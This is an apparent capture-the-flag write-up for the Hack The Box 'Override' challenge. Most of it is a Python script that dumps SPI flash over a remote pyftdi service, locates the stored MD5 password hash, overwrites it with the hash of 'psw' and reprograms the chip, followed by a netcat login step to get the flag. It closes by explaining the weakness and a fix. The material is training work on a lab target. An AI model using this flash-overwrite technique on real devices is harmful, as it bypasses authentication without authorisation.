
HackTheBox Override Writeup

Explore the basics of cybersecurity in the Override Challenge on Hack The Box. This medium-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.

import socket
import json
import hashlib
import sys

# Command opcodes placed in the first byte of each packet passed to exchange().
# NOTE(review): the values look like the common SPI NOR flash command set;
# confirm against the target chip's datasheet.
PAGE_PROGRAM = 0x02  # followed by a 3-byte address and the page data
WRITE_ENABLE = 0x06  # sent on its own before each erase/program command
SECTOR_ERASE = 0x20  # followed by a 3-byte address

# Chunk size used when the image is split into pages for programming.
PAGE_SIZE = 256

def new_pass(secret_value):
    """Return the MD5 digest of *secret_value* as a list of 16 integers.

    The string is encoded with ``str.encode()`` (UTF-8 by default) before it
    is hashed, and the raw digest bytes are returned as a list so they can be
    spliced into the list of byte values read from the device.
    """
    # NOTE(review): a single unsalted MD5 is used because the script has to
    # produce the same format the device already stores; it is not a suitable
    # password-storage scheme for a new design.
    digest = hashlib.md5(secret_value.encode()).digest()
    return [byte for byte in digest]

def write_pages(pages):
    """Program every chunk in *pages* through exchange(), one command each.

    Chunk number N is sent with the address bytes ``[0x00, N, 0x00]``, and a
    WRITE_ENABLE command is issued before each PAGE_PROGRAM command.

    Args:
        pages: Sequence of lists of byte values, as produced by split_pages().
    """
    for page_no, data in enumerate(pages):
        # The page number is used directly as the middle address byte.
        # NOTE(review): nothing here bounds page_no to 0-255 - confirm the
        # image never exceeds 256 pages.
        header = [PAGE_PROGRAM, 0x00, page_no, 0x00]
        program_cmd = header + data
        exchange([WRITE_ENABLE])
        exchange(program_cmd)

def split_pages(original_list, chunk_size):
    """Split *original_list* into consecutive slices of *chunk_size* items.

    The final slice is shorter when the length is not a multiple of
    *chunk_size*; an empty input yields an empty list.
    """
    chunks = []
    for start in range(0, len(original_list), chunk_size):
        chunks.append(original_list[start:start + chunk_size])
    return chunks

# Exactly one argument is expected: the target service as "<ip:port>".
if len(sys.argv) == 2:
    # Both values stay strings here; exchange() applies int() to port.
    host, port = sys.argv[1].split(':')
else:
    print(f"Usage: {sys.argv[0]} <ip:port>")
    sys.exit(1)

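def exchange(hex_list, value=0):
    """Send one command to the remote service and return its decoded reply.

    A new TCP connection to the module-level ``host``/``port`` is opened for
    every call. The request is a JSON object naming the tool, chip-select
    pin, device URL, the bytes to send and the number of bytes to read back.

    Args:
        hex_list: Byte values to transmit; each is serialised with ``hex()``.
        value: Number of bytes to read back, sent as ``readlen``.

    Returns:
        The object decoded from the JSON reply. The framing below treats a
        trailing ``]`` as end-of-message, so a JSON array is expected.

    Raises:
        ValueError: If the peer closes the connection before a complete JSON
            document has arrived (raised by the decode/parse step).
    """
    cs = 0
    usb_device_url = 'ftdi://ftdi:2232h/1'
    command_data = {
        "tool": "pyftdi",
        "cs_pin": cs,
        "url": usb_device_url,
        "data_out": [hex(x) for x in hex_list],
        "readlen": value
    }
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.connect((host, int(port)))
        s.sendall(json.dumps(command_data).encode('utf-8'))
        data = b''
        while not data.endswith(b']'):
            chunk = s.recv(1024)
            if not chunk:
                # recv() returns b'' once the peer has closed the connection.
                # Without this check the loop would spin forever on a
                # truncated or differently terminated reply.
                break
            data += chunk
        response = json.loads(data.decode('utf-8'))
    return response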

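# Read 4096 bytes back after sending 0x03 followed by the address 0x000000.
mem_data = exchange([0x03, 0x00, 0x00, 0x00], 4096)

from itertools import groupby

# Split the dump into runs of non-zero values, keeping each value's position
# so the start offset of a run is known exactly. (Searching a space-joined
# string for the run can match in the middle of a number, e.g. "5 6" inside
# "15 6", and then report the wrong offset.)
runs = [
    list(group)
    for is_zero, group in groupby(enumerate(mem_data), lambda pair: pair[1] == 0)
    if not is_zero
]
entries = [[byte for _, byte in run] for run in runs]

# The first run that is exactly 16 values long is taken to be the stored
# digest (16 is the length of the MD5 digest returned by new_pass()).
target_run = next((run for run in runs if len(run) == 16), None)
if target_run:
    index = target_run[0][0]
    target_entry = [byte for _, byte in target_run]
else:
    index = None
    target_entry = None

print("Target sublist:", target_entry)
print("Start position in original hash:", index)

if index is None:
    # Stop before any erase/program command is sent: without an offset there
    # is nothing to patch, and the slicing below would fail with a TypeError.
    print("No 16-byte non-zero run found in the dump; nothing was written.")
    sys.exit(1)

new_hash_list = new_pass('psw')
print('New hash:', new_hash_list)

# Rebuild the image with the 16 stored digest bytes swapped for the new ones.
part1 = mem_data[:index]
part2 = mem_data[index + 16:]
new_mem_data = part1 + new_hash_list + part2
# NOTE(review): this removes every 0xFF value, not only trailing ones. An
# 0xFF inside the data or inside the new digest would be dropped as well and
# shift everything after it - presumably only erased padding at the end was
# meant; check the dump before relying on this.
new_mem_data = [x for x in new_mem_data if x != 255]

pages = split_pages(new_mem_data, PAGE_SIZE)
print('Program pages with new logs..')

# NOTE(review): assumes the sector erased at address 0 covers all of the
# 4096 bytes read above - TODO confirm the sector size of the target chip.
exchange([WRITE_ENABLE])
exchange([SECTOR_ERASE, 0x00, 0x00, 0x00])
write_pages(pages)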

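The script reads the first 4096 bytes of the flash, locates the 16-byte run that holds the stored MD5 password hash, replaces it with the MD5 of psw, and reprograms the flash. Then connect to the other port using nc (netcat) and enter the new password (psw). The flag is displayed once the password is entered.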

Summary

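The Override Challenge on Hack The Box is a medium-level challenge focused on encryption reversal and file handling. It involves modifying memory data to change the password, using a Python script to update the device. After connecting to the other port via nc (netcat) and entering the new password (psw), the flag is revealed. The underlying weakness is that the password check relies on an unsalted MD5 hash held in flash that can be rewritten without authentication, so anyone who can issue flash commands can set the password; write-protecting that region or authenticating its contents would close the gap.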

This post is licensed under CC BY 4.0 by the author.